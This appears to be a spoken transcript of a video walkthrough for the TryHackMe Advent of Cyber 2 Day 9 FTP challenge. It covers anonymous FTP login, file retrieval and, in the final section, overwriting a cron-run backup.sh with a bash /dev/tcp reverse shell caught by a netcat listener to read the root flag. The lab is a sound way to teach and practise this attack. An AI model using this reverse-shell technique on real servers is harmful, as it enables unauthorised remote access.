Hello guys, welcome to new video Advent of Cyber 2. So in previous video we have solved up to date 8. In this video we are going to solve day 9 challenge. So just scroll down below. It is a task 14. So just scroll up. Task 14 day 9 networking anyone can be Santa. So first of all I will start this machine and you can also refer this walkthrough video like watch Dark Stars video on solving this task. Here you will get better understanding about how you can solve this task. So this is just a theory part. Now uh, anyone can be Santa prelude. Even Santa has been having to adapt the work from home ethic in 2020. To help Santa out, Ilp Max Kiddy and their team created a file server for the best festival company TBFC that uses the FTP protocol. However, an attacker was able to hack this new server. Your mission, should you choose to accept it, is to understand how this hack occurred and to retrace the steps of the attacker. Okay, means we have to just try to hack into this machine using FTP. So this is just a theory part. Our machine is not started yet. I think I need to refresh this page again. So I will just refresh this again. Okay, it is loading the page now. Now scroll down below and again try to start this machine. Click on start machine button. Okay, this will start this machine. Now you can just go through this theory part like getting started with this challenge, today's learning objective, what is FTP and where it is used, what is port 20, what is port 21. So it is used for data, port 21 is used for commands, no credentials, no problem, using FTP over terminal, some commands you can just refer. And here is our first question. Name the directory on the FTP server that has the data accessible by the anonymous user. Okay, we need to find a directory on FTP server and the user we are going to use to log in is anonymous. So we need to copy our machine's IP to get FTP access. Okay, so still it is not started yet. Okay, I will just click on start machine again and our machine is starting now. Now just close this pop-up box. To connect to our machine, first of all we need to connect to the OpenVPN. To start the OpenVPN, open Terminator. Okay, it is not started yet. Just try to click on it again. To extend this window, you can use Windows up arrow command. Now we need to navigate to directory where we have downloaded OpenVPN file. So I have downloaded it in desktop. Try hack me, and after ls you can check there is our OpenVPN file decryptor.ovpn. Okay, so to connect to this, I will just split this window by Control Shift E, then Control Shift O. Again use command sudo openvpn and file name. So our file name is decryptor.ovpn. So just specify that and hit the enter button. Thereafter enter a default credential of Kali user. So it is Kali and hit the enter button. We have successfully connected to OpenVPN. Now let's try to check our IP by using command IPA. You can see it have assigned us IP 10.9.10.208. So we are successfully connected to the OpenVPN. Let's copy our target machine's IP. So it is 10.10.8.126. Let's try to ping to this IP to check whether the system is live or not. Now you can see it is showing TTL request, means our target machine is live. Now we need to check that FTP port is open or not. So FTP's port number is 21. So I will just split this window by Control Shift E and try to enter command telnet. Okay, I will just maximize this. Now use telnet space press div by Control Shift V and enter port 21. So it is for FTP and you can see it is showing escape character is, means this port is open. You can just close this window by Control Shift W. We know that port 21 is open. Now let's try to access it through FTP. So use command FTP paste the IP by Control Shift V and hit the enter button. Now it is asking name, means we have to provide here username. As we already know, the username is anonymous. You can just refer the question here. So first question is, name the directory on the FTP server data accessible by anonymous user. So just enter your username as a anonymous and hit the enter button. You can see it doesn't ask for any password. We are currently logged in as an anonymous user. Now let's try to use ls and you can see there are plenty of files. So last there is one public folder which have read write execute access for all user group and others. So this is the directory who have access to anonymous user. So I will just enter here public and click on submit. Now second question is, what script gets executed within this directory? Okay, we need to get into this directory. So I will use command cd and directory name is public and hit the enter button. Use your ls to display all contents. You can see there is one script backup.sh. So it is a shell script which is getting executed. So I will just enter its name backup.sh. Click on submit and our answer is correct. Now third question is, what movie did Santa have on his Christmas shopping list? Okay, so there was also one file instead of backup.sh, shopping list.txt. So we will display its content. So if I enter here cat shopping list.txt, it will not display its content. You can see it is showing error, invalid command. We need to download this on our local machine. To download this on our local machine, you can use command get and file name. So it is shopping list.txt. And you can see it have downloaded shopping list.txt on our local machine. You can just use ls command on our local machine, and here is our shopping list.txt. To display its content, use command cat shopping list.txt. So here is the movie The Polar Express. So you can just copy this movie name by right clicking on it, copy, paste it into answer format, remove last movie from this and click on submit. Our answer is correct. Now only last question left. Re-upload this script to contain malicious data just like we did in section 9.6. Output the content of /root/flag.txt. Note that the script that we have uploaded may take minute to return a connection. If it doesn't after a couple of minutes, double check that you have set up a Netcat listener on the device that you are working from and have provided the try-hack-me IP of the device that you are connecting from. Okay, so we are just going to get a reversal connection from this backup.sh script. So first of all, I will make one backup.sh script on our local machine and try to put this on our target machine. For that, I will use command nano backup.sh and hit the enter button. Now we are going to make a shell script. So for that, I will use here hash explanation /bin/bash. Hit the enter button. Now use bash -i. You can just get multiple type of reversal connection commands from Google. So this is one of the command you can use for getting a reversal connection. So I will use here bash -i greater than and thereafter /dev/tcp, then provide our local machine IP. So for that I will just split the screen by Ctrl Shift E, use command IPA, and here is our IP 10.9.10.208. So enter here 10.9.10.208 slash port number on which we are going to listen on. So I will mention here 4444. You can just provide any port as you want. Now use here 0 greater than and 1, and to save this you can use Ctrl O, enter button, then use Ctrl X to exit from this. Now we need to upload this on our target machine. So first of all I will start a Netcat listener for this backup.sh. So the port number which we are listening on is 4444. So use command nc-nlvp and provide the port number as a 4444. Okay, we have started the Netcat listener. Now we need to upload this on our target machine. So use command put backup.sh on our target machine. Okay, it has successfully uploaded our payload here. After this you can see there is backup.sh and you can just find its modified date. So it is 15 July and the old one was 16 November. Okay, so we have successfully modified this backup.sh. Now you can see we successfully got this reversal automatically. So let's try to find flag.txt. After ls you can see there is one flag.txt file. Let's display its content by using cat flag.txt. And here is our flag. Here you can be Santa. So you can just copy this flag, right click, copy, open try-hack-me and paste it into answer format. Click on submit and our answer is correct. So this is how you can solve Advent of Cyber 2 Day 9 challenge. I hope you like this video. If you like this video, then don't forget to like, comment, share and subscribe to my channel. And also, if you are interested in learning ethical hacking, bug bounty hunting or penetration testing, you can simply enroll into my course. I have given the course link into the description. You can just check it out. Thank you for watching.